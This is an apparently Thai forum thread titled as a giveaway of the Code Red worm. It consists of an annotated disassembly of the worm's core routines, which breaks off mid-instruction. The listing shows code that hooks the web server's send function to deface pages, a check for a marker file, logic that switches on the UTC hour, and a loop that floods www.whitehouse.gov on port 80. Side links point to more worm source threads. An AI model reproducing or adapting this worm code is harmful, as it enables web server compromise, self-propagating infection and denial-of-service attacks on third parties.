seg000:000006AD 73 12 jnb short FOUND_HTML ; load eax with the data segment
seg000:000006AF 8B 95 50 FE FF FF mov edx, [ebp-1B0h]
seg000:000006B5 81 3A 4C 4D 54 48 cmp dword ptr [edx], 48544D4Ch ; look for HTML
seg000:000006BB 75 02 jnz short GET_HTML_INC_JUMP ; Jump if Not Zero (ZF=0)
seg000:000006BD EB 02 jmp short FOUND_HTML ; load eax with the data segment
seg000:000006BF ; ��
seg000:000006BF
seg000:000006BF GET_HTML_INC_JUMP: ; CODE XREF: HACK_PAGE+6C j
seg000:000006BF EB CB jmp short GET_HTML_INC ; Get the next byte to compare to
seg000:000006C1 ; ��
seg000:000006C1
seg000:000006C1 FOUND_HTML: ; CODE XREF: HACK_PAGE+5E j
seg000:000006C1 ; HACK_PAGE+6E j
seg000:000006C1 8B 85 50 FE FF FF mov eax, [ebp-1B0h] ; load eax with the data segment
seg000:000006C7 83 C0 04 add eax, 4 ; Add
seg000:000006CA 8B 8D 4C FE FF FF mov ecx, [ebp-1B4h] ; set ecx with the counter
seg000:000006D0 89 41 08 mov [ecx+8], eax
seg000:000006D3 8B F4 mov esi, esp ; move the web data into the request return
seg000:000006D5 8D 95 48 FE FF FF lea edx, [ebp-1B8h] ; Load Effective Address
seg000:000006DB 52 push edx ; set ebp-1b8 to receive the old page protection
seg000:000006DC 6A 04 push 4 ; make page readwrte
seg000:000006DE 68 00 40 00 00 push 4000h ; for 4000 hex bytes
seg000:000006E3 8B 85 CC FE FF FF mov eax, [ebp-134h] ; stored write address for w3svc
seg000:000006E9 50 push eax
seg000:000006EA FF 95 A8 FE FF FF call dword ptr [ebp-158h] ; VirtualProtect
seg000:000006F0 3B F4 cmp esi, esp ; Compare Two Operands
seg000:000006F2 90 nop ; No Operation
seg000:000006F3 43 inc ebx ; Increment by 1
seg000:000006F4 4B dec ebx ; Decrement by 1
seg000:000006F5 43 inc ebx ; Increment by 1
seg000:000006F6 4B dec ebx ; Decrement by 1
seg000:000006F7 C7 85 4C FE FF FF+ mov dword ptr [ebp-1B4h], 0 ; reset counter to 0
seg000:00000701 EB 0F jmp short TCPSOCKSEND_FIND ; check if counter is 3000h yet
seg000:00000703 ; ��
seg000:00000703
seg000:00000703 TCPSOCKSEND_FIND_INC: ; CODE XREF: HACK_PAGE+123 j
seg000:00000703 8B 8D 4C FE FF FF mov ecx, [ebp-1B4h]
seg000:00000709 83 C1 01 add ecx, 1 ; Add
seg000:0000070C 89 8D 4C FE FF FF mov [ebp-1B4h], ecx
seg000:00000712
seg000:00000712 TCPSOCKSEND_FIND: ; CODE XREF: HACK_PAGE+B2 j
seg000:00000712 81 BD 4C FE FF FF+ cmp dword ptr [ebp-1B4h], 3000h ; check if counter is 3000h yet
seg000:0000071C 7D 56 jge short RESET_MEM_PROTECTION ; go here if it is
seg000:0000071E 8B 95 CC FE FF FF mov edx, [ebp-134h] ; set edx to the base
seg000:00000724 03 95 4C FE FF FF add edx, [ebp-1B4h] ; add the offset from counter
seg000:0000072A 8B 02 mov eax, [edx] ; store the value at the offset into eax
seg000:0000072C 3B 85 B0 FE FF FF cmp eax, [ebp-150h] ; check ebp-150 against eax(tcpsocksend)
seg000:00000732 75 3E jnz short TCPSOCKSEND_FIND_INC_JUMP ; jump here on a not match
seg000:00000734 8B 8D CC FE FF FF mov ecx, [ebp-134h] ; load base into ecx
seg000:0000073A 03 8D 4C FE FF FF add ecx, [ebp-1B4h] ; set ecx to the address of tcpsocksend
seg000:00000740 8B 95 60 FE FF FF mov edx, [ebp-1A0h] ; set edx to o.C98
seg000:00000746 89 11 mov [ecx], edx ; replace the call to TCPSOCKSEND to o.C98
seg000:00000748 8B F4 mov esi, esp
seg000:0000074A 68 00 51 25 02 push 2255100h ; sleep for a long time
seg000:0000074F FF 95 A0 FE FF FF call dword ptr [ebp-160h] ; Sleep
seg000:00000755 3B F4 cmp esi, esp ; Compare Two Operands
seg000:00000757 90 nop ; No Operation
seg000:00000758 43 inc ebx ; Increment by 1
seg000:00000759 4B dec ebx ; Decrement by 1
seg000:0000075A 43 inc ebx ; Increment by 1
seg000:0000075B 4B dec ebx ; Decrement by 1
seg000:0000075C 8B 85 CC FE FF FF mov eax, [ebp-134h] ; set eax to the base of the loaded dll
seg000:00000762 03 85 4C FE FF FF add eax, [ebp-1B4h] ; set eax to actual address of tcpsocksend
seg000:00000768 8B 8D B0 FE FF FF mov ecx, [ebp-150h] ; set ecx to tcpsocksend
seg000:0000076E 89 08 mov [eax], ecx ; replace the call to tcpsocksend with the original
seg000:00000770 EB 02 jmp short RESET_MEM_PROTECTION ; RESET_MEM_PROTECTION
seg000:00000772 ; ��
seg000:00000772
seg000:00000772 TCPSOCKSEND_FIND_INC_JUMP: ; CODE XREF: HACK_PAGE+E3 j
seg000:00000772 EB 8F jmp short TCPSOCKSEND_FIND_INC ; Jump
seg000:00000774 ; ��
seg000:00000774
seg000:00000774 RESET_MEM_PROTECTION: ; CODE XREF: HACK_PAGE+CD j
seg000:00000774 ; HACK_PAGE+121 j
seg000:00000774 8B F4 mov esi, esp ; RESET_MEM_PROTECTION
seg000:00000776 8D 95 4C FE FF FF lea edx, [ebp-1B4h] ; Load Effective Address
seg000:0000077C 52 push edx
seg000:0000077D 8B 85 48 FE FF FF mov eax, [ebp-1B8h]
seg000:00000783 50 push eax
seg000:00000784 68 00 40 00 00 push 4000h
seg000:00000789 8B 8D CC FE FF FF mov ecx, [ebp-134h]
seg000:0000078F 51 push ecx
seg000:00000790 FF 95 A8 FE FF FF call dword ptr [ebp-158h] ; VirtualProtect
seg000:00000796 3B F4 cmp esi, esp ; Compare Two Operands
seg000:00000798 90 nop ; No Operation
seg000:00000799 43 inc ebx ; Increment by 1
seg000:0000079A 4B dec ebx ; Decrement by 1
seg000:0000079B 43 inc ebx ; Increment by 1
seg000:0000079C 4B dec ebx ; Decrement by 1
seg000:0000079D
seg000:0000079D DO_THE_WORK: ; CODE XREF: DO_RVA+3D5 j
seg000:0000079D ; DO_RVA+40D j ...
seg000:0000079D BA 01 00 00 00 mov edx, 1 ; this exits from sub 224, not positive of the end result.
seg000:000007A2 85 D2 test edx, edx ; if edx ==0, then jump down to c91
seg000:000007A4 0F 84 E7 04 00 00 jz TIGHT_LOOP ; This is a tight loop
seg000:000007AA 8B F4 mov esi, esp
seg000:000007AC 6A 00 push 0 ; HANDLE hTemplateFile // handle to template file
seg000:000007AE 68 80 00 00 00 push 80h ; '�' ; DWORD dwFlagsAndAttributes // file attributes
seg000:000007AE ; this is FILE_ATTRIBUTE_NORMAL
seg000:000007B3 6A 03 push 3 ; DWORD dwCreationDisposition // how to create
seg000:000007B3 ; this is for OPEN_EXISTING
seg000:000007B5 6A 00 push 0 ; LPSECURITY_ATTRIBUTES lpSecurityAttributes // SD
seg000:000007B7 6A 01 push 1 ; DWORD dwShareMode // share mode
seg000:000007B7 ; this equates to FILE_SHARE_READ
seg000:000007B9 68 00 00 00 80 push 80000000h ; DWORD dwDesiredAccess // access mode
seg000:000007B9 ; this is for GENERIC_READ
seg000:000007BE 8B 85 68 FE FF FF mov eax, [ebp-198h]
seg000:000007C4 83 C0 63 add eax, 63h ; 'c' ; this points eax to c:\notworm
seg000:000007C7 50 push eax ; LPCTSTR lpFileName // file name
seg000:000007C8 FF 95 9C FE FF FF call dword ptr [ebp-164h] ; CreateFileA
seg000:000007CE 3B F4 cmp esi, esp ; Compare Two Operands
seg000:000007D0 90 nop ; No Operation
seg000:000007D1 43 inc ebx ; Increment by 1
seg000:000007D2 4B dec ebx ; Decrement by 1
seg000:000007D3 43 inc ebx ; Increment by 1
seg000:000007D4 4B dec ebx ; Decrement by 1
seg000:000007D5 89 85 30 FE FF FF mov [ebp-1D0h], eax
seg000:000007DB 83 BD 30 FE FF FF+ cmp dword ptr [ebp-1D0h], 0FFFFFFFFh ; Compare Two Operands
seg000:000007E2 74 1F jz short NOTWORM_NO ; jump if Createfile failed
seg000:000007E4
seg000:000007E4 NOTWORM_YES: ; CODE XREF: HACK_PAGE+1B2 j
seg000:000007E4 B9 01 00 00 00 mov ecx, 1
seg000:000007E9 85 C9 test ecx, ecx ; Logical Compare
seg000:000007EB 74 16 jz short NOTWORM_NO ; Jump if Zero (ZF=1)
seg000:000007ED 8B F4 mov esi, esp
seg000:000007EF 68 FF FF FF 7F push 7FFFFFFFh ; push a LONG time(basically forever)
seg000:000007F4 FF 95 A0 FE FF FF call dword ptr [ebp-160h] ; Sleep
seg000:000007F4 ;
seg000:000007FA 3B F4 cmp esi, esp ; Compare Two Operands
seg000:000007FC 90 nop ; No Operation
seg000:000007FD 43 inc ebx ; Increment by 1
seg000:000007FE 4B dec ebx ; Decrement by 1
seg000:000007FF 43 inc ebx ; Increment by 1
seg000:00000800 4B dec ebx ; Decrement by 1
seg000:00000801 EB E1 jmp short NOTWORM_YES ; Jump
seg000:00000803 ; ��
seg000:00000803
seg000:00000803 NOTWORM_NO: ; CODE XREF: HACK_PAGE+193 j
seg000:00000803 ; HACK_PAGE+19C j
seg000:00000803 8B F4 mov esi, esp
seg000:00000805 8D 95 38 FE FF FF lea edx, [ebp-1C8h] ; LPSYSTEMTIME lpSystemTime // system time
seg000:0000080B 52 push edx
seg000:0000080C FF 95 94 FE FF FF call dword ptr [ebp-16Ch] ; GetSystemTime
seg000:00000812 3B F4 cmp esi, esp ; Compare Two Operands
seg000:00000814 90 nop ; No Operation
seg000:00000815 43 inc ebx ; Increment by 1
seg000:00000816 4B dec ebx ; Decrement by 1
seg000:00000817 43 inc ebx ; Increment by 1
seg000:00000818 4B dec ebx ; Decrement by 1
seg000:00000819 8B 85 3E FE FF FF mov eax, [ebp-1C2h] ; load eax with day and hour, UTC
seg000:0000081F 89 85 4C FE FF FF mov [ebp-1B4h], eax ; store day in ebp-1b4
seg000:00000825 8B 8D 4C FE FF FF mov ecx, [ebp-1B4h] ; set ecx to day and hour UTC
seg000:0000082B 81 E1 FF FF 00 00 and ecx, 0FFFFh ; get lower word(hour, UTC)
seg000:00000831 89 8D 4C FE FF FF mov [ebp-1B4h], ecx ; save the UTC hour at ebp-1b4
seg000:00000837 83 BD 4C FE FF FF+ cmp dword ptr [ebp-1B4h], 14h ; check if hour is less than 20
seg000:0000083E 0F 8C 47 01 00 00 jl INFECT_HOST ; set seconds and milisecond to eax
seg000:00000844
seg000:00000844 TIME_GREATER_20: ; CODE XREF: HACK_PAGE+337 j
seg000:00000844 BA 01 00 00 00 mov edx, 1
seg000:00000849 85 D2 test edx, edx ; Logical Compare
seg000:0000084B 0F 84 3A 01 00 00 jz INFECT_HOST ; set seconds and milisecond to eax
seg000:00000851 8B F4 mov esi, esp
seg000:00000853 8D 85 38 FE FF FF lea eax, [ebp-1C8h] ; LPSYSTEMTIME lpSystemTime // system time
seg000:00000859 50 push eax
seg000:0000085A FF 95 94 FE FF FF call dword ptr [ebp-16Ch] ; GetSystemTime
seg000:00000860 3B F4 cmp esi, esp ; Compare Two Operands
seg000:00000862 90 nop ; No Operation
seg000:00000863 43 inc ebx ; Increment by 1
seg000:00000864 4B dec ebx ; Decrement by 1
seg000:00000865 43 inc ebx ; Increment by 1
seg000:00000866 4B dec ebx ; Decrement by 1
seg000:00000867 8B 8D 3E FE FF FF mov ecx, [ebp-1C2h] ; load ecx with day and hour, UTC
seg000:0000086D 89 8D 4C FE FF FF mov [ebp-1B4h], ecx ; store ecx in ebp-1b4
seg000:00000873 8B 95 4C FE FF FF mov edx, [ebp-1B4h]
seg000:00000879 81 E2 FF FF 00 00 and edx, 0FFFFh ; load edx with day and hour UTC
seg000:0000087F 89 95 4C FE FF FF mov [ebp-1B4h], edx
seg000:00000885 83 BD 4C FE FF FF+ cmp dword ptr [ebp-1B4h], 1Ch ; check if hour is less than 28
seg000:0000088C 7C 1F jl short WHITEHOUSE_SOCKET_SETUP ; Jump if Less (SF!=OF)
seg000:0000088E
seg000:0000088E NEVER_CALLED1: ; CODE XREF: HACK_PAGE+25C j
seg000:0000088E B8 01 00 00 00 mov eax, 1 ; this code is self referential and is never called, as far as can be seen
seg000:00000893 85 C0 test eax, eax ; Logical Compare
seg000:00000895 74 16 jz short WHITEHOUSE_SOCKET_SETUP ; Jump if Zero (ZF=1)
seg000:00000897 8B F4 mov esi, esp
seg000:00000899 68 FF FF FF 7F push 7FFFFFFFh
seg000:0000089E FF 95 A0 FE FF FF call dword ptr [ebp-160h] ; Sleep
seg000:000008A4 3B F4 cmp esi, esp ; Compare Two Operands
seg000:000008A6 90 nop ; No Operation
seg000:000008A7 43 inc ebx ; Increment by 1
seg000:000008A8 4B dec ebx ; Decrement by 1
seg000:000008A9 43 inc ebx ; Increment by 1
seg000:000008AA 4B dec ebx ; Decrement by 1
seg000:000008AB EB E1 jmp short NEVER_CALLED1 ; this code is self referential and is never called, as far as can be seen
seg000:000008AD ; ��
seg000:000008AD
seg000:000008AD WHITEHOUSE_SOCKET_SETUP: ; CODE XREF: HACK_PAGE+23D j
seg000:000008AD ; HACK_PAGE+246 j
seg000:000008AD 8B F4 mov esi, esp
seg000:000008AF 6A 64 push 64h ; 'd'
seg000:000008B1 FF 95 A0 FE FF FF call dword ptr [ebp-160h] ; Sleep
seg000:000008B7 3B F4 cmp esi, esp ; Compare Two Operands
seg000:000008B9 90 nop ; No Operation
seg000:000008BA 43 inc ebx ; Increment by 1
seg000:000008BB 4B dec ebx ; Decrement by 1
seg000:000008BC 43 inc ebx ; Increment by 1
seg000:000008BD 4B dec ebx ; Decrement by 1
seg000:000008BE 8B F4 mov esi, esp
seg000:000008C0 6A 00 push 0 ; int protocol
seg000:000008C2 6A 01 push 1 ; fam
seg000:000008C4 6A 02 push 2 ; pr
seg000:000008C6 FF 95 B8 FE FF FF call dword ptr [ebp-148h] ; socket
seg000:000008CC 3B F4 cmp esi, esp ; Compare Two Operands
seg000:000008CE 90 nop ; No Operation
seg000:000008CF 43 inc ebx ; Increment by 1
seg000:000008D0 4B dec ebx ; Decrement by 1
seg000:000008D1 43 inc ebx ; Increment by 1
seg000:000008D2 4B dec ebx ; Decrement by 1
seg000:000008D3 89 85 78 FE FF FF mov [ebp-188h], eax ; store sock descriptor
seg000:000008D9 66 C7 85 7C FE FF+ mov word ptr [ebp-184h], 2 ; set afam
seg000:000008E2 66 C7 85 7E FE FF+ mov word ptr [ebp-182h], 5000h ; set port(80)
seg000:000008EB C7 85 80 FE FF FF+ mov dword ptr [ebp-180h], 5BF089C6h ; set ip (www.whitehouse.gov)
seg000:000008F5 8B F4 mov esi, esp
seg000:000008F7 6A 10 push 10h ; push len
seg000:000008F9 8D 8D 7C FE FF FF lea ecx, [ebp-184h] ; push sockaddr
seg000:000008FF 51 push ecx
seg000:00000900 8B 95 78 FE FF FF mov edx, [ebp-188h] ; push sock descriptor
seg000:00000906 52 push edx
seg000:00000907 FF 95 BC FE FF FF call dword ptr [ebp-144h] ; connect
seg000:0000090D 3B F4 cmp esi, esp ; Compare Two Operands
seg000:0000090F 90 nop ; No Operation
seg000:00000910 43 inc ebx ; Increment by 1
seg000:00000911 4B dec ebx ; Decrement by 1
seg000:00000912 43 inc ebx ; Increment by 1
seg000:00000913 4B dec ebx ; Decrement by 1
seg000:00000914 C7 85 4C FE FF FF+ mov dword ptr [ebp-1B4h], 0 ; store 0 at ebp-1b4
seg000:0000091E EB 0F jmp short WHITEHOUSE_SOCKET_SEND ; if counter >= 18000h jump
seg000:00000920 ; ��
seg000:00000920
seg000:00000920 WHITEHOUSE_SOCKET_SEND_INC: ; CODE XREF: HACK_PAGE+321 j
seg000:00000920 8B 85 4C FE FF FF mov eax, [ebp-1B4h]
seg000:00000926 83 C0 01 add eax, 1 ; inc counter
seg000:00000929 89 85 4C FE FF FF mov [ebp-1B4h], eax
seg000:0000092F
seg000:0000092F WHITEHOUSE_SOCKET_SEND: ; CODE XREF: HACK_PAGE+2CF j
seg000:0000092F 81 BD 4C FE FF FF+ cmp dword ptr [ebp-1B4h], 18000h ; if counter >= 18000h jump
seg000:00000939 7D 37 jge short WHITEHOUSE_SLEEP_LOOP ; Jump if Greater or Equal (SF=OF)
seg000:0000093B 8B F4 mov esi, esp
seg000:0000093D 68 E8 03 00 00 push 3E8h
seg000:00000942 FF 95 A0 FE FF FF call dword ptr [ebp-160h] ; Sleep
seg000:00000948 3B F4 cmp esi, esp ; Compare Two Operands
seg000:0000094A 90 nop ; No Operation
seg000:0000094B 43 inc ebx ; Increment by 1
seg000:0000094C 4B dec ebx ; Decrement by 1
seg000:0000094D 43 inc ebx ; Increment by 1
seg000:0000094E 4B dec ebx ; Decrement by 1
seg000:0000094F 8B F4 mov esi, esp
seg000:00000951 6A 00 push 0 ; no flags
seg000:00000953 6A 01 push 1 ; send len 1
seg000:00000955 8D 8D FC FE FF FF lea ecx, [ebp-104h] ; addr of buf
seg000:0000095B 51 push ecx
seg000:0000095C 8B 95 78 FE FF FF mov edx, [ebp-188h] ; sock descriptor
seg000:00000962 52 push edx
seg000:00000963 FF 95 C0 FE FF FF call dword ptr [ebp-140h] ; Send
seg000:00000963 ;
seg000:00000963 ; sends 1 byte
seg000:00000969 3B F4 cmp esi, esp ; Compare Two Operands
seg000:0000096B 90 nop ; No Operation
seg000:0000096C 43 inc ebx ; Increment by 1
seg000:0000096D 4B dec ebx ; Decrement by 1
seg000:0000096E 43 inc ebx ; Increment by 1
seg000:0000096F 4B dec ebx ; Decrement by 1
seg000:00000970 EB AE jmp short WHITEHOUSE_SOCKET_SEND_INC ; jump back to send
seg000:00000972 ; ��
seg000:00000972
seg000:00000972 WHITEHOUSE_SLEEP_LOOP: ; CODE XREF: HACK_PAGE+2EA j
seg000:00000972 8B F4 mov esi, esp
seg000:00000974 68 00 00 00 01 push 1000000h ; sleep for around 4.66 hours
seg000:00000979 FF 95 A0 FE FF FF call dword ptr [ebp-160h] ; Sleep
seg000:0000097F 3B F4 cmp esi, esp ; Compare Two Operands
seg000:00000981 90 nop ; No Operation
seg000:00000982 43 inc ebx ; Increment by 1
seg000:00000983 4B dec ebx ; Decrement by 1
seg000:00000984 43 inc ebx ; Increment by 1
seg000:00000985 4B dec ebx ; Decrement by 1
seg000:00000986 E9 B9 FE FF FF jmp TIME_GREATER_20 ; Jump
seg000:0000098B ; ��
seg000:0000098B
seg000:0000098B INFECT_HOST: ; CODE XREF: HACK_PAGE+1EF j
seg000:0000098B ; HACK_PAGE+1FC j
seg000:0000098B 8B 85 44 FE FF FF mov eax, [ebp-1BCh] ; set seconds and milisecond to eax
seg000:00000991 89 85 50 FE FF FF mov [ebp-1B0h], eax ; store at ebp-1b0
seg000:00000997 8B 8D 50 FE FF FF mov ecx, [ebp-1B0h] ; load seconds and miliseconds to ecx
seg000:000009

Thread: แจก Code Red Worm

Thread Tools

Similar Threads

IRC-Worm.BAT (Source code)

+++Source Code Visual Basic+++>>Worm Virus !!! Win32.Autoexec.worm

+++Source Code: Hi5 Worm!!!!

EOF.Bat.Worm Code

ใครโดน W32.MSN.Worm และ W32.MSN2.Worm เข้ามา

Members who have read this thread : 0

Tags for this Thread

Posting Permissions